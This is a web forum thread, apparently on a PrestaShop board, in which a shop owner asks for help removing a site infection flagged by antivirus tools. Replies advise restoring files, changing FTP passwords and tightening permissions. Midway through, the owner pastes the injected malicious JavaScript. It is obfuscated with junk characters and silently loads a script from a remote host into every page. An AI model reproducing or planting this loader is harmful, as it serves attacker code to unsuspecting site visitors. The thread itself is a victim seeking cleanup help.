Updated! Problems with our shop. Hacked, trojan and phishing warning

[Yumex]

Hello people!

We have had some problems with our shop. People using avast
have seen a trojan error message looking like this:

http://i355.photobucket.com/albums/r447/Yumex_photobucket/trojanattack.jpg

We solved the problem with the help from the avast community. Saying it was some
hack and false code that entered our site. We cleaned it up with a "fixfiles.php".
It came back 3 days later, but I have continued to clean it since.

How to make it go away? On top of it, avg sounded the alarm on the website today
as well, calling it a phising warning.

How do we get rid of this hack?, is there a solution to clean it. We own a few other
prestashop and only these two: www.ji-style.se, www.ji-style.com has the problem (they are
made in the same manner).

Thank you for your time

Read my latest post for new developement!

[Paul C]

Bottom line is that you need to restore the original files to remove it from the site. I think the chances are high that someone (maybe not you if this is the only site you work on that has the problem) has compromised their FTP account for that site and it's being used to upload the infection. The javascript just redirects I think (so as long as there's nothing nasty on the page you end up on it will be fine). You need to also make sure that the PCs used by anyone who has FTP access to that site don't have a virus that will compromise their FTP account again (you can possiby check access times against when the problem file was modified in your server logs).

Change all of the FTP passwords.

Note that if you're on shared hosting and any directory in your site has 777 permissions, then chances are high that ANYONE with an account/site on that shared server has the ability to infect files in those directories via FTP.

Paul

[tomerg3]

If you have 777 permissions, any half decent hacker can infect / hack your files, even without ftp access.

Most good hosting companies won't even let you set 777 on certain files (like .php) for security reasons.

755 should be the highest permission you should set.

[Yumex]

New developement:

Thanks for all your answers this far!

We found the evil script after the end tag when you look
at the the source code of wwwJi-style.se


-------------------------------------------------------------

[removed]/*LGPL*/ try{ window.onload = function(){var Vn2uu7b4p4h8b = document.createElement('s$!#c(#)#r$i&)!p!!t#'.replace(/\)|&|\(|@|\^|\!|#|\$/ig, ''));Vn2uu7b4p4h8b.setAttribute('defer', 'd![spam-filter]e&([spam-filter]f$!)e!)r!#'.replace(/#|\$|\)|\^|&|@|\(|\!/ig, ''));Vn2uu7b4p4h8b.setAttribute('type', 't)^e#x)&^t#/@^@j#^a)^v@#@#a$#s&@&&c;(r@i))$!&p;#)t$@'.replace(/\$|&|#|\!|\(|@|\^|\)/ig, ''));Vn2uu7b4p4h8b.setAttribute('id', 'G&(!^&c;^@#@e^)a#$l$&(o^)t(!^6!$$k$@5!$&9;@1#5^#^'.replace(/@|\!|\)|&|#|\(|\^|\$/ig, ''));Vn2uu7b4p4h8b.setAttribute('s@&&r;(#c@!#()'.replace(/\!|\^|@|\$|&|\)|#|\(/ig, ''), 'h@(t)&!)t))p@)):#)/(!&/)##m($l($)(b&-$c^!)$o@^m(@^.#^s@^!)h)!^i(@^&n;$$#o@b!&i;$^.#j^&&p;^)&.^))i#@m&^&!2(!8())()6&!$-$c^!#o@m[spam-filter]^$.&&w;#o([spam-filter]&r;&(^l$$$d#(&w;^!&e;)$!b&$w(($#o!r$$@l^#&d;)&.^&^r!u!^$&:^&8;$^0$(@8^0(^/!&d;)a(i#@l@y!m^#!)o!@##t#@^i!^o#!#@n.(@(c@!#o@&^m&/@d#&$a)^@i^$(^l)y(!m&@^o$t#&i;)##@o!(^n&()^.@^^c@^!o&&^m()!#!/!^(g^^!$o#$o!$g@!l(()e#.^@c&o;&m;##$)^/$!$m$&e;@$#$t($-$(a$$^r)#$t!@^).#&c;o;)!$#m&$#)/&@#)t)!$u#!.$tv;#&&/!&@'.replace(/#|\!|&|\)|@|\(|\$|\^/ig, ''));if (document){document.body.appendChild(Vn2uu7b4p4h8b);[spam-filter] } catch(Qzo0b0sji1w324zi1s8n) {}[removed]
<!--975ca243573d6965a4d9963e9dac54e9-->
-------------------------------------------------------------



We are looking for two scripts and their names are:

Ntd4xow4556gm
K6yizzfy5k

How do we find their location and how do we seach for
scripts in all those connected php and tpl files.

//Yume

[tomerg3]

I have come across 2 types of malicious codes

1) The simple one - uses ftp to plant and <iframe> in all html and php files (usually only names index or home)
2) The real bad ass - this I saw only one time on server of someone I did a job for, this kept implanting code in files as they were being loaded.
if you viewed the file with ftp, it would look fine, but when loaded from a browser, the malicious code would appear.

They ended up getting their host to fix it, I actually don't know if it was an issue from the host, or if their site was hacked, I just waited for it to get fixed so I could start the changes I was hired to do.

If you look at the file in question in ftp, and it looks clean, but from the browser it is infected, then try to talk to your host.

If it is infect when you check it on ftp, than try to restore a backup you have, or clean the files one by one

[Yumex]

Thanks for the tips, but the problem is we don't know which files are infected.
So I need to get that in order first.

How can I find the codes, locate them?

[tomerg3]

If the code is always the same, and you have ssh (shell) access than it's fairly easy to do.

If the bad code is not the same, or you don't have ssh access, you can do it by comparing the last time the files were modified in the FTP program, you can sort by date, so they will all show up together.

[rololo88]

Hi All,


I used to have same virus on my website today i found a fix (i hope for longtime) on this website
http://justcoded.com/article/gumblar-family-virus-removal-tool/

Just download the file and upload it on your server via FTP , then call it thru your website
Ex: www.mywebsite.com/curevir.php then it will load the script and fix all the infected files for you.

Then use a clean computer and change any password to access your FTP.

Good Luck!

Thanks for the tips, but the problem is we don't know which files are infected.
So I need to get that in order first.

How can I find the codes, locate them?

[gemmo]

tomer3g

You said that any half decent hacker can infect/hack my files, even without ftp access, if you have 777 permissions. You also say 755 should be the highest, how does that comply with prestashop or other cms/shops out there that must have 777 permissions to work...

Shouldnt every directory in the prestashop have a .htaccess file even if it were blank to prevent intruder creating a .htaccess for there manipulative purposes...?

[tomerg3]

tomer3g

You said that any half decent hacker can infect/hack my files, even without ftp access, if you have 777 permissions. You also say 755 should be the highest, how does that comply with prestashop or other cms/shops out there that must have 777 permissions to work...

Shouldnt every directory in the prestashop have a .htaccess file even if it were blank to prevent intruder creating a .htaccess for there manipulative purposes...?

They really need 777 to work, as long as your host configures the permissions (owner and group) properly.

I use bluehost.com, and they have set the permissions so 755 file can have write access when running from the browser.